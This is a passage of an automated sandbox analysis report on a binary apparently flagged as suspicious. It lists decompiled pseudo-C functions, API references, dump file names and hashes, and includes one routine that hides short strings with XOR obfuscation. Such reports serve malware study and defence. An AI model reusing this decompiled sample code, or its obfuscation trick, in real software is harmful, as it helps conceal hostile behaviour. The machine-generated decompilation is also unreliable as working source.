                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429a49
                                                                    0x00429a1e
                                                                    0x00429a24
                                                                    0x00429a26
                                                                    0x00429a2b
                                                                    0x00429a2b
                                                                    0x00000000
                                                                    0x004299d2
                                                                    0x004299d2
                                                                    0x004299d3
                                                                    0x004299dc
                                                                    0x004299e0
                                                                    0x004299e9
                                                                    0x00000000
                                                                    0x004299e9
                                                                    0x00000000
                                                                    0x004299e0
                                                                    0x00429970
                                                                    0x00429981
                                                                    0x00429983
                                                                    0x00429988
                                                                    0x004299e2
                                                                    0x004299e2
                                                                    0x00429a9d
                                                                    0x00429aad
                                                                    0x00429aad
                                                                    0x00000000
                                                                    0x00429988
                                                                    0x0042996e

                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00000000,?,00431328,00000038,00427E6E,?,00000000,00000000,0042788D,00000000,00000000,00430BB8,0000001C,0042762B,00000001,00000020), ref: 00429923
                                                                    • GetCPInfo.KERNEL32(00000000,00000001), ref: 00429936
                                                                    • _strlen.LIBCMT ref: 0042995A
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,0042788D,?,00000000,00000000), ref: 0042997B
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Info$ByteCharMultiWide_strlen
                                                                    • String ID:
                                                                    • API String ID: 1335377746-0
                                                                    • Opcode ID: 84f8d699a89d0c529e1f5333f2c627b69930f80d739d88c10a0791bde07cf783
                                                                    • Instruction ID: 8491ba68a7b28b21bc4dd99918f9cad46d6bb60cea3b2ed61df8530d040e7c81
                                                                    • Opcode Fuzzy Hash: 84f8d699a89d0c529e1f5333f2c627b69930f80d739d88c10a0791bde07cf783
                                                                    • Instruction Fuzzy Hash: 20518B70A00269EBCF219F96FC8599FBBB9FF85760F60421EF815A2260D7354D40CB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E0042707A() {
                                                                    				int _v4;
                                                                    				int _v8;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				intOrPtr _t7;
                                                                    				CHAR* _t8;
                                                                    				WCHAR* _t16;
                                                                    				int _t19;
                                                                    				char* _t23;
                                                                    				int _t24;
                                                                    				long _t28;
                                                                    				int _t29;
                                                                    				void* _t34;
                                                                    				intOrPtr _t35;
                                                                    				WCHAR* _t36;
                                                                    				CHAR* _t37;
                                                                    				intOrPtr _t38;
                                                                    				int _t40;
                                                                    
                                                                    				_t7 =  *0x4483c8; // 0x1
                                                                    				_t29 = 0;
                                                                    				_t36 = 0;
                                                                    				_t38 = 2;
                                                                    				if(_t7 != 0) {
                                                                    					L6:
                                                                    					__eflags = _t7 - 1;
                                                                    					if(__eflags != 0) {
                                                                    						__eflags = _t7 - _t38;
                                                                    						if(_t7 == _t38) {
                                                                    							L21:
                                                                    							_t8 = GetEnvironmentStrings();
                                                                    							_t37 = _t8;
                                                                    							__eflags = _t37 - _t29;
                                                                    							if(_t37 == _t29) {
                                                                    								L20:
                                                                    								return 0;
                                                                    							}
                                                                    							__eflags =  *_t37 - _t29;
                                                                    							if( *_t37 == _t29) {
                                                                    								L25:
                                                                    								_t39 = _t8 - _t37 + 1;
                                                                    								_t34 = E00422EEB(_t8 - _t37 + 1);
                                                                    								__eflags = _t34 - _t29;
                                                                    								if(_t34 != _t29) {
                                                                    									E00422FB0(_t34, _t37, _t39);
                                                                    								} else {
                                                                    									_t34 = 0;
                                                                    								}
                                                                    								FreeEnvironmentStringsA(_t37);
                                                                    								return _t34;
                                                                    							} else {
                                                                    								goto L23;
                                                                    							}
                                                                    							do {
                                                                    								do {
                                                                    									L23:
                                                                    									_t8 =  &(_t8[1]);
                                                                    									__eflags =  *_t8 - _t29;
                                                                    								} while ( *_t8 != _t29);
                                                                    								_t8 =  &(_t8[1]);
                                                                    								__eflags =  *_t8 - _t29;
                                                                    							} while ( *_t8 != _t29);
                                                                    							goto L25;
                                                                    						}
                                                                    						__eflags = _t7 - _t29;
                                                                    						if(_t7 == _t29) {
                                                                    							goto L21;
                                                                    						}
                                                                    						goto L20;
                                                                    					}
                                                                    					L7:
                                                                    					if(_t36 != _t29) {
                                                                    						L9:
                                                                    						_t16 = _t36;
                                                                    						if( *_t36 == _t29) {
                                                                    							L12:
                                                                    							_t35 =  *0x4300dc;
                                                                    							_t19 = (_t16 - _t36 >> 1) + 1;
                                                                    							_v4 = _t19;
                                                                    							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
                                                                    							if(_t40 != _t29) {
                                                                    								_t23 = E00422EEB(_t40);
                                                                    								_v8 = _t23;
                                                                    								if(_t23 != _t29) {
                                                                    									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
                                                                    									_t52 = _t24;
                                                                    									if(_t24 == 0) {
                                                                    										_push(_v8);
                                                                    										E0042275E(_t29, _t35, _t36, _t52);
                                                                    										_v8 = _t29;
                                                                    									}
                                                                    									_t29 = _v8;
                                                                    								}
                                                                    							}
                                                                    							FreeEnvironmentStringsW(_t36);
                                                                    							return _t29;
                                                                    						} else {
                                                                    							goto L10;
                                                                    						}
                                                                    						do {
                                                                    							do {
                                                                    								L10:
                                                                    								_t16 = _t16 + _t38;
                                                                    							} while ( *_t16 != _t29);
                                                                    							_t16 = _t16 + _t38;
                                                                    						} while ( *_t16 != _t29);
                                                                    						goto L12;
                                                                    					}
                                                                    					_t36 = GetEnvironmentStringsW();
                                                                    					if(_t36 == _t29) {
                                                                    						goto L20;
                                                                    					}
                                                                    					goto L9;
                                                                    				}
                                                                    				_t36 = GetEnvironmentStringsW();
                                                                    				if(_t36 == 0) {
                                                                    					_t28 = GetLastError();
                                                                    					__eflags = _t28 - 0x78;
                                                                    					if(_t28 != 0x78) {
                                                                    						_t7 =  *0x4483c8; // 0x1
                                                                    					} else {
                                                                    						_t7 = _t38;
                                                                    						 *0x4483c8 = _t7;
                                                                    					}
                                                                    					goto L6;
                                                                    				} else {
                                                                    					 *0x4483c8 = 1;
                                                                    					goto L7;
                                                                    				}
                                                                    			}























                                                                    0x0042707c
                                                                    0x0042708b
                                                                    0x0042708d
                                                                    0x00427093
                                                                    0x00427094
                                                                    0x004270c3
                                                                    0x004270c3
                                                                    0x004270c6
                                                                    0x00427145
                                                                    0x00427147
                                                                    0x00427151
                                                                    0x00427151
                                                                    0x00427157
                                                                    0x00427159
                                                                    0x0042715b
                                                                    0x0042714d
                                                                    0x00000000
                                                                    0x0042714d
                                                                    0x0042715d
                                                                    0x0042715f
                                                                    0x0042716b
                                                                    0x0042716e
                                                                    0x00427176
                                                                    0x00427178
                                                                    0x0042717b
                                                                    0x00427184
                                                                    0x0042717d
                                                                    0x0042717d
                                                                    0x0042717d
                                                                    0x0042718d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427161
                                                                    0x00427161
                                                                    0x00427161
                                                                    0x00427161
                                                                    0x00427162
                                                                    0x00427162
                                                                    0x00427166
                                                                    0x00427167
                                                                    0x00427167
                                                                    0x00000000
                                                                    0x00427161
                                                                    0x00427149
                                                                    0x0042714b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042714b
                                                                    0x004270c8
                                                                    0x004270ca
                                                                    0x004270d4
                                                                    0x004270d7
                                                                    0x004270d9
                                                                    0x004270e9
                                                                    0x004270e9
                                                                    0x004270f7
                                                                    0x004270fc
                                                                    0x00427102
                                                                    0x00427106
                                                                    0x00427109
                                                                    0x00427111
                                                                    0x00427115
                                                                    0x00427122
                                                                    0x00427124
                                                                    0x00427126
                                                                    0x00427128
                                                                    0x0042712c
                                                                    0x00427132
                                                                    0x00427132
                                                                    0x00427136
                                                                    0x00427136
                                                                    0x00427115
                                                                    0x0042713b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004270db
                                                                    0x004270db
                                                                    0x004270db
                                                                    0x004270db
                                                                    0x004270dd
                                                                    0x004270e2
                                                                    0x004270e4
                                                                    0x00000000
                                                                    0x004270db
                                                                    0x004270ce
                                                                    0x004270d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004270d2
                                                                    0x00427098
                                                                    0x0042709c
                                                                    0x004270aa
                                                                    0x004270b0
                                                                    0x004270b3
                                                                    0x004270be
                                                                    0x004270b5
                                                                    0x004270b5
                                                                    0x004270b7
                                                                    0x004270b7
                                                                    0x00000000
                                                                    0x0042709e
                                                                    0x0042709e
                                                                    0x00000000
                                                                    0x0042709e

                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32(74714DE0,00000000,?,?,?,?,00422D84,?,004303A8,00000060), ref: 00427096
                                                                    • GetLastError.KERNEL32(?,?,?,?,00422D84,?,004303A8,00000060), ref: 004270AA
                                                                    • GetEnvironmentStringsW.KERNEL32(74714DE0,00000000,?,?,?,?,00422D84,?,004303A8,00000060), ref: 004270CC
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,74714DE0,00000000,?,?,?,?,00422D84), ref: 00427100
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,00422D84,?,004303A8,00000060), ref: 00427122
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,00422D84,?,004303A8,00000060), ref: 0042713B
                                                                    • GetEnvironmentStrings.KERNEL32(74714DE0,00000000,?,?,?,?,00422D84,?,004303A8,00000060), ref: 00427151
                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0042718D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 883850110-0
                                                                    • Opcode ID: 802735a0f898e2909fe7587d227eedce19ca91db60a041bfb666be2f1a9d0af4
                                                                    • Instruction ID: ba2b8ba984046b5f27e92ab85f9a00d714186ba2064ddea9c65c530777ee0fd4
                                                                    • Opcode Fuzzy Hash: 802735a0f898e2909fe7587d227eedce19ca91db60a041bfb666be2f1a9d0af4
                                                                    • Instruction Fuzzy Hash: 8531407270C2346FE7202F657CC483BBAACEE15394B91053FF542C3340E62A8C5592AD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 53%
                                                                    			E004181F0(void* __ecx) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				void* _v36;
                                                                    				void* _v40;
                                                                    				signed int _t55;
                                                                    				signed int _t57;
                                                                    				void* _t60;
                                                                    				void* _t62;
                                                                    				signed int _t64;
                                                                    				signed int _t75;
                                                                    				signed int _t76;
                                                                    				void* _t79;
                                                                    				intOrPtr* _t83;
                                                                    				void* _t87;
                                                                    				intOrPtr* _t88;
                                                                    				void* _t89;
                                                                    
                                                                    				_t89 =  &_v16;
                                                                    				_t62 = __ecx;
                                                                    				_t64 =  *0x447d20; // 0x0
                                                                    				_v8 = 0x7b;
                                                                    				_v7 = 0x7e;
                                                                    				_v6 = 0x6b;
                                                                    				_v5 = 0x7e;
                                                                    				_v4 = 0x32;
                                                                    				_v3 = 0x35;
                                                                    				_v2 = 0x3f;
                                                                    				_t76 = _t64;
                                                                    				_t87 = 0;
                                                                    				do {
                                                                    					_t8 = _t76 - 0x5d; // -93
                                                                    					_t76 = _t76 + ((_t8 ^ 0x0000147c) + (_t8 ^ 0x0000147c) * 0x00000008) * 0x00000008 | 0x00005be7;
                                                                    					 *(_t89 + _t87 + 0x14) =  *(_t89 + _t87 + 0x14) ^ 0x0000003f;
                                                                    					_t87 = _t87 + 1;
                                                                    				} while (_t87 < 7);
                                                                    				_v16 = 0x33;
                                                                    				_v13 = 0x33;
                                                                    				_v15 = 0x34;
                                                                    				_v14 = 0x10;
                                                                    				_v12 = 0x34;
                                                                    				_v11 = 0x3e;
                                                                    				_t79 = 0;
                                                                    				do {
                                                                    					_t23 = _t64 - 0x5d; // -93
                                                                    					_t64 = _t64 + ((_t23 ^ 0x0000147c) + (_t23 ^ 0x0000147c) * 0x00000008) * 0x00000008 | 0x00005be7;
                                                                    					 *(_t89 + _t79 + 0xc) =  *(_t89 + _t79 + 0xc) ^ 0x0000003e;
                                                                    					_t79 = _t79 + 1;
                                                                    				} while (_t79 < 6);
                                                                    				_t83 =  *0x43003c;
                                                                    				_push( &_v8);
                                                                    				if(E00419410( *_t83(), __ecx,  &_v12, _t53) != 0xffffffff) {
                                                                    					_t88 = __ecx + 0x24;
                                                                    					_push(_t88);
                                                                    					_t55 = E004180B0();
                                                                    					__eflags = _t55;
                                                                    					if(_t55 != 0) {
                                                                    						L11:
                                                                    						return _t55;
                                                                    					} else {
                                                                    						__eflags =  *_t88 - 0x162;
                                                                    						if(__eflags == 0) {
                                                                    							_t57 = E0040C340( *((intOrPtr*)(_t89 + 0x24)), __eflags, _t62,  *((intOrPtr*)(_t89 + 0x20)));
                                                                    							__eflags = _t57;
                                                                    							if(_t57 == 0) {
                                                                    								goto L5;
                                                                    							} else {
                                                                    								_t60 = E00419410( *_t83(_t89 + 0xc), _t62, _t89 + 0x10, _t59);
                                                                    								__eflags = _t60 - 0xffffffff;
                                                                    								_t75 = (0 | _t60 != 0xffffffff) - 0x00000001 & 0x00000007;
                                                                    								__eflags = _t75;
                                                                    								_t55 = _t75;
                                                                    								goto L11;
                                                                    							}
                                                                    						} else {
                                                                    							return 8;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					L5:
                                                                    					return 7;
                                                                    				}
                                                                    			}






























                                                                    0x004181f0
                                                                    0x004181f5
                                                                    0x004181f7
                                                                    0x00418200
                                                                    0x00418205
                                                                    0x00418209
                                                                    0x0041820e
                                                                    0x00418212
                                                                    0x00418217
                                                                    0x0041821c
                                                                    0x00418221
                                                                    0x00418223
                                                                    0x00418225
                                                                    0x00418225
                                                                    0x00418239
                                                                    0x0041823f
                                                                    0x00418243
                                                                    0x00418244
                                                                    0x0041824d
                                                                    0x00418251
                                                                    0x00418255
                                                                    0x00418259
                                                                    0x0041825e
                                                                    0x00418262
                                                                    0x00418267
                                                                    0x00418270
                                                                    0x00418270
                                                                    0x00418284
                                                                    0x0041828a
                                                                    0x0041828e
                                                                    0x0041828f
                                                                    0x00418294
                                                                    0x0041829e
                                                                    0x004182b1
                                                                    0x004182c1
                                                                    0x004182c4
                                                                    0x004182c7
                                                                    0x004182cc
                                                                    0x004182ce
                                                                    0x0041831b
                                                                    0x00418321
                                                                    0x004182d0
                                                                    0x004182d0
                                                                    0x004182d6
                                                                    0x004182f0
                                                                    0x004182f5
                                                                    0x004182f7
                                                                    0x00000000
                                                                    0x004182f9
                                                                    0x00418308
                                                                    0x0041830f
                                                                    0x00418316
                                                                    0x00418316
                                                                    0x00418319
                                                                    0x00000000
                                                                    0x00418319
                                                                    0x004182d8
                                                                    0x004182e3
                                                                    0x004182e3
                                                                    0x004182d6
                                                                    0x004182b3
                                                                    0x004182b3
                                                                    0x004182be
                                                                    0x004182be

                                                                    APIs
                                                                    • lstrlen.KERNEL32(0000007B), ref: 0041829F
                                                                    • lstrlen.KERNEL32(?,?,?,00000000), ref: 004182FE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: 2$5$>$?$k${
                                                                    • API String ID: 1659193697-1582361192
                                                                    • Opcode ID: e7f0358b6a6750a17489cf01af993e1e7863c6de51b3ab0213c66aa97795c57a
                                                                    • Instruction ID: b54a9745a3754593113dd8cf9dde3e855b0ddebd7efce6c766b199bf35de5c17
                                                                    • Opcode Fuzzy Hash: e7f0358b6a6750a17489cf01af993e1e7863c6de51b3ab0213c66aa97795c57a
                                                                    • Instruction Fuzzy Hash: A431043520C7818AD315DB2898806DFBBD89FE5318F044DAEE4D187292DA79D64EC7B3
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 68%
                                                                    			E00425396(int _a4) {
                                                                    				struct HINSTANCE__* _t3;
                                                                    				_Unknown_base(*)()* _t4;
                                                                    
                                                                    				_t3 = GetModuleHandleA("mscoree.dll");
                                                                    				if(_t3 != 0) {
                                                                    					_t4 = GetProcAddress(_t3, "CorExitProcess");
                                                                    					if(_t4 != 0) {
                                                                    						 *_t4(_a4);
                                                                    					}
                                                                    				}
                                                                    				ExitProcess(_a4);
                                                                    			}





                                                                    0x0042539b
                                                                    0x004253a3
                                                                    0x004253ab
                                                                    0x004253b3
                                                                    0x004253b9
                                                                    0x004253b9
                                                                    0x004253b3
                                                                    0x004253bf

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(mscoree.dll,00425504,?,00430658,00000008,0042553B,?,00000001,00000000,00429D9B,00000003), ref: 0042539B
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004253AB
                                                                    • ExitProcess.KERNEL32 ref: 004253BF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressExitHandleModuleProcProcess
                                                                    • String ID: CorExitProcess$mscoree.dll$Mqt`7utIqt
                                                                    • API String ID: 75539706-2436749482
                                                                    • Opcode ID: ff917975f4c10fa9d34215895b9f096ed1fdebb81394d224e8fa3d60a7a1ef10
                                                                    • Instruction ID: 9bf8c4e0c9a6583785c89ea69a9a746f61292f79e8f7ca4467acd2ae4f5fde5c
                                                                    • Opcode Fuzzy Hash: ff917975f4c10fa9d34215895b9f096ed1fdebb81394d224e8fa3d60a7a1ef10
                                                                    • Instruction Fuzzy Hash: DDD0C970308200ABDB142B61BD3EB5B3AB8AF84B51B102A25B849D0171CF78C810DE1D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E00427CEB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t42;
                                                                    				void* _t43;
                                                                    				short* _t45;
                                                                    				int _t58;
                                                                    				int _t62;
                                                                    				long _t65;
                                                                    				int _t67;
                                                                    				void* _t69;
                                                                    				short* _t77;
                                                                    				short* _t78;
                                                                    				int _t79;
                                                                    				short* _t83;
                                                                    				short* _t84;
                                                                    				void* _t85;
                                                                    				short* _t86;
                                                                    				void* _t91;
                                                                    
                                                                    				_t69 = __ecx;
                                                                    				_push(0x1c);
                                                                    				_push(0x430bb8);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t83 = 0;
                                                                    				_t91 =  *0x448424 - _t83; // 0x1
                                                                    				if(_t91 == 0) {
                                                                    					if(GetStringTypeW(1, 0x430bb4, 1, _t85 - 0x1c) == 0) {
                                                                    						_t65 = GetLastError();
                                                                    						__eflags = _t65 - 0x78;
                                                                    						if(_t65 == 0x78) {
                                                                    							 *0x448424 = 2;
                                                                    						}
                                                                    					} else {
                                                                    						 *0x448424 = 1;
                                                                    					}
                                                                    				}
                                                                    				_t42 =  *0x448424; // 0x1
                                                                    				if(_t42 == 2 || _t42 == _t83) {
                                                                    					_t67 =  *(_t85 + 0x1c);
                                                                    					__eflags = _t67 - _t83;
                                                                    					if(_t67 == _t83) {
                                                                    						_t67 =  *0x448460; // 0x0
                                                                    					}
                                                                    					_t77 =  *(_t85 + 0x18);
                                                                    					__eflags = _t77;
                                                                    					if(_t77 == 0) {
                                                                    						_t77 =  *0x448470; // 0x0
                                                                    					}
                                                                    					_t43 = E004298A2(_t67);
                                                                    					__eflags = _t43 - 0xffffffff;
                                                                    					if(_t43 != 0xffffffff) {
                                                                    						__eflags = _t43 - _t77;
                                                                    						if(__eflags == 0) {
                                                                    							L29:
                                                                    							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
                                                                    							__eflags = _t83;
                                                                    							if(__eflags != 0) {
                                                                    								_push(_t83);
                                                                    								E0042275E(_t67, _t78, _t83, __eflags);
                                                                    							}
                                                                    							_t45 = _t78;
                                                                    							goto L32;
                                                                    						}
                                                                    						_push(0);
                                                                    						_push(0);
                                                                    						_push(_t85 + 0x10);
                                                                    						_push( *(_t85 + 0xc));
                                                                    						_push(_t43);
                                                                    						_push(_t77);
                                                                    						_t83 = E004298E5(_t67, _t77, _t83, __eflags);
                                                                    						__eflags = _t83;
                                                                    						if(_t83 == 0) {
                                                                    							goto L25;
                                                                    						}
                                                                    						 *(_t85 + 0xc) = _t83;
                                                                    						goto L29;
                                                                    					} else {
                                                                    						goto L25;
                                                                    					}
                                                                    				} else {
                                                                    					if(_t42 != 1) {
                                                                    						L25:
                                                                    						_t45 = 0;
                                                                    						L32:
                                                                    						return E00424267(_t45);
                                                                    					}
                                                                    					 *(_t85 - 0x24) = _t83;
                                                                    					 *(_t85 - 0x20) = _t83;
                                                                    					if( *(_t85 + 0x18) == _t83) {
                                                                    						_t62 =  *0x448470; // 0x0
                                                                    						 *(_t85 + 0x18) = _t62;
                                                                    					}
                                                                    					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
                                                                    					 *(_t85 - 0x28) = _t79;
                                                                    					if(_t79 == 0) {
                                                                    						goto L25;
                                                                    					} else {
                                                                    						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                    						_t68 = _t79 + _t79;
                                                                    						E00422920(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
                                                                    						 *(_t85 - 0x18) = _t86;
                                                                    						_t84 = _t86;
                                                                    						 *(_t85 - 0x2c) = _t84;
                                                                    						E004282F0(_t84, 0, _t79 + _t79);
                                                                    						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
                                                                    						_t99 = _t84;
                                                                    						if(_t84 != 0) {
                                                                    							L15:
                                                                    							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
                                                                    							if(_t58 != 0) {
                                                                    								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
                                                                    							}
                                                                    							_t102 =  *(_t85 - 0x20);
                                                                    							if( *(_t85 - 0x20) != 0) {
                                                                    								_push(_t84);
                                                                    								E0042275E(_t68, _t79, _t84, _t102);
                                                                    							}
                                                                    							_t45 =  *(_t85 - 0x24);
                                                                    							goto L32;
                                                                    						} else {
                                                                    							_push(_t79);
                                                                    							_push(2);
                                                                    							_t84 = E00427472(_t68, _t79, _t84, _t99);
                                                                    							if(_t84 == 0) {
                                                                    								goto L25;
                                                                    							}
                                                                    							 *(_t85 - 0x20) = 1;
                                                                    							goto L15;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}



















                                                                    0x00427ceb
                                                                    0x00427ceb
                                                                    0x00427ced
                                                                    0x00427cf2
                                                                    0x00427cf7
                                                                    0x00427cf9
                                                                    0x00427cff
                                                                    0x00427d17
                                                                    0x00427d21
                                                                    0x00427d27
                                                                    0x00427d2a
                                                                    0x00427d2c
                                                                    0x00427d2c
                                                                    0x00427d19
                                                                    0x00427d19
                                                                    0x00427d19
                                                                    0x00427d17
                                                                    0x00427d36
                                                                    0x00427d3e
                                                                    0x00427e2e
                                                                    0x00427e31
                                                                    0x00427e33
                                                                    0x00427e35
                                                                    0x00427e35
                                                                    0x00427e3b
                                                                    0x00427e3e
                                                                    0x00427e40
                                                                    0x00427e42
                                                                    0x00427e42
                                                                    0x00427e49
                                                                    0x00427e4f
                                                                    0x00427e52
                                                                    0x00427e58
                                                                    0x00427e5a
                                                                    0x00427e7a
                                                                    0x00427e8d
                                                                    0x00427e8f
                                                                    0x00427e91
                                                                    0x00427e93
                                                                    0x00427e94
                                                                    0x00427e99
                                                                    0x00427e9a
                                                                    0x00000000
                                                                    0x00427e9a
                                                                    0x00427e5c
                                                                    0x00427e5e
                                                                    0x00427e63
                                                                    0x00427e64
                                                                    0x00427e67
                                                                    0x00427e68
                                                                    0x00427e71
                                                                    0x00427e73
                                                                    0x00427e75
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427e77
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00427d4c
                                                                    0x00427d4f
                                                                    0x00427e54
                                                                    0x00427e54
                                                                    0x00427e9c
                                                                    0x00427ea4
                                                                    0x00427ea4
                                                                    0x00427d55
                                                                    0x00427d58
                                                                    0x00427d5e
                                                                    0x00427d60
                                                                    0x00427d65
                                                                    0x00427d65
                                                                    0x00427d89
                                                                    0x00427d8b
                                                                    0x00427d90
                                                                    0x00000000
                                                                    0x00427d96
                                                                    0x00427d96
                                                                    0x00427d9a
                                                                    0x00427da5
                                                                    0x00427daa
                                                                    0x00427dad
                                                                    0x00427daf
                                                                    0x00427db6
                                                                    0x00427dbe
                                                                    0x00427dd9
                                                                    0x00427ddb
                                                                    0x00427df4
                                                                    0x00427e01
                                                                    0x00427e09
                                                                    0x00427e19
                                                                    0x00427e19
                                                                    0x00427e1c
                                                                    0x00427e20
                                                                    0x00427e22
                                                                    0x00427e23
                                                                    0x00427e28
                                                                    0x00427e29
                                                                    0x00000000
                                                                    0x00427ddd
                                                                    0x00427ddd
                                                                    0x00427dde
                                                                    0x00427de7
                                                                    0x00427deb
